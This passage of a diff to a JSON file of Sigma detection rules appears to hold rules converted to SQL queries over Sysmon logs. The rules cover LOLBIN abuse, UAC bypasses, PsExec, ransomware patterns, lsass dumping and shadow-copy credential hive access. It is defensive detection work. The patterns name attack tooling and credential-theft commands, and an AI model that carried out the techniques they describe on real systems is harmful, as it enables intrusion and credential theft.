Burkard (Nextron Systems)", + "title": "Suspicious AgentExecutor PowerShell Execution", + "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "status": "experimental", + "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", + "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" + "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" }, { - "title": "Suspicious Binary In User Directory Spawned From Office Application", - "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", + "title": "Potential PsExec Remote Execution", + "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", "status": "experimental", - "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, 
Excel, PowerPoint, Publisher, Visio)", - "author": "Jason Lynch", + "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.g0046", - "car.2013-05-002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND Image LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" + "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" }, { - "title": "Execution via CL_Invocation.ps1", - "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", - "status": "test", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "File Download Using Notepad++ GUP Utility", + "id": "44143844-0631-49ab-97a0-96387d6b2d7c", + "status": "experimental", + "description": "Detects execution of the Notepad++ updater (gup) from a process 
other than Notepad++ to download files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Other parent processes other than notepad++ using GUP that are not currently identified" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cl_invocation.yml" + "filename": "proc_creation_win_gup_download.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Update Activity", - "id": "e7581747-1e44-4d4b-85a6-0db0b4a00f2a", + "title": "Suspicious Windows App Activity", + "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", "status": "experimental", - "description": "Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software", + "description": "Detects suspicious children of application launched from inside the WindowsApps directory. 
This could be a sign of a rogue \".appx\" package installation/execution", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\3CXDesktopApp\\\\app\\\\update.exe' ESCAPE '\\' AND CommandLine LIKE '%--update%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%/electron/update/win32/18.12%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((Image LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_update.yml" + "filename": "proc_creation_win_susp_appx_execution.yml" }, { - "title": "Bypass UAC via WSReset.exe", - "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", + "id": "55f0a3a1-846e-40eb-8273-677371b8d912", "status": "test", - "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1059", + "attack.t1202" ], "falsepositives": [ - "Unknown sub processes of Wsreset.exe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_wsreset.yml" + "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", - "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", - "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "title": "UAC Bypass Using Event Viewer RecentViews", + "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" + "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" }, { - "title": "Potential Procdump Evasion", - "id": "79b06761-465f-4f88-9ef2-150e24d3d737", + "title": "WMI Backdoor Exchange Transport Agent", + "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", "status": "test", - "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", + "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event 
filters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Cases in which procdump just gets copied to a different directory without any renaming" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" + "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher", - "id": "27aec9c9-dbb0-4939-8422-1742242471d0", + "title": "Suspicious Process Created Via Wmic.EXE", + "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", "status": "test", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron 
Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" + "filename": 
"proc_creation_win_wmic_susp_process_creation.yml" }, { - "title": "Rundll32 UNC Path Execution", - "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", - "status": "experimental", - "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DarkSide Ransomware Pattern", + "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "status": "test", + "description": "Detects DarkSide Ransomware and helpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1021.002", - "attack.t1218.011" + "attack.t1204" ], "falsepositives": [ - "Unlikely" + "Unknown", + "UAC bypass method used by other malware" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_unc_path.yml" + "filename": "proc_creation_win_malware_darkside_ransomware.yml" }, { - "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", - "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", - "status": "test", - "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - Crassus Execution", + "id": 
"2c32b543-1058-4808-91c6-5b31b8bed6c5", + "status": "experimental", + "description": "Detects Crassus a windows privilege escalation discovery tool based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1070.001" + "attack.discovery", + "attack.t1590.001" ], "falsepositives": [ - "Legitimate deactivation by administrative staff", - "Installer tools that disable services, e.g. before log collection agent installation" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Crassus.exe' ESCAPE '\\' OR OriginalFileName = 'Crassus.exe' OR Description LIKE '%Crassus%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_logman_disable_eventlog.yml" + "filename": "proc_creation_win_pua_crassus.yml" }, { - "title": "Suspicious Mshta.EXE Execution Patterns", - "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", + "title": "Sensitive Registry Access via Volume Shadow Copy", + "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", "status": "experimental", - "description": "Detects suspicious mshta process execution patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a command that accesses password storing registry hives via volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ 
- "attack.execution", - "attack.t1106" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Some rare backup scenarios" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_susp_pattern.yml" + "filename": "proc_creation_win_malware_conti_shadowcopy.yml" }, { - "title": "Renamed ProcDump Execution", - "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", - "status": "test", - "description": 
"Detects the execution of a renamed ProcDump executable often used by attackers or malware", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential CVE-2022-29072 Exploitation Attempt", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", + "status": "experimental", + "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.execution", + "cve.2022.29072" ], "falsepositives": [ - "Procdump illegaly bundled with legitimate software", - "Administrators who rename binaries (should be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" ], - "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" + "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" }, 
{ - "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", - "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", + "title": "PUA - AdvancedRun Suspicious Execution", + "id": "fa00b701-44c6-4679-994d-5a18afa8a707", "status": "experimental", - "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], + "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_use_mount_internet_share.yml" + "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" }, { - "title": "Potential SystemNightmare Exploitation Attempt", - "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "title": "TAIDOOR RAT DLL Load", + "id": "d1aa3382-abab-446f-96ea-4de52908210b", "status": "test", - 
"description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", + "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.execution", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_systemnightmare.yml" + "filename": "proc_creation_win_apt_taidoor.yml" }, { - "title": "Suspicious Ping/Del Command Combination", - "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", - "status": "experimental", - "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. 
Its used to hide the file responsible for the initial infection for example", - "author": "Ilya Krestinichev", + "title": "Remote Access Tool - ScreenConnect Suspicious Execution", + "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "status": "test", + "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrative staff" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" }, { - "title": "Potential RDP Tunneling Via SSH Plink", - "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "title": "Invoke-Obfuscation STDIN+ Launcher", + "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", "status": "test", - "description": "Execution of plink to perform data exfiltration and tunneling", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute 
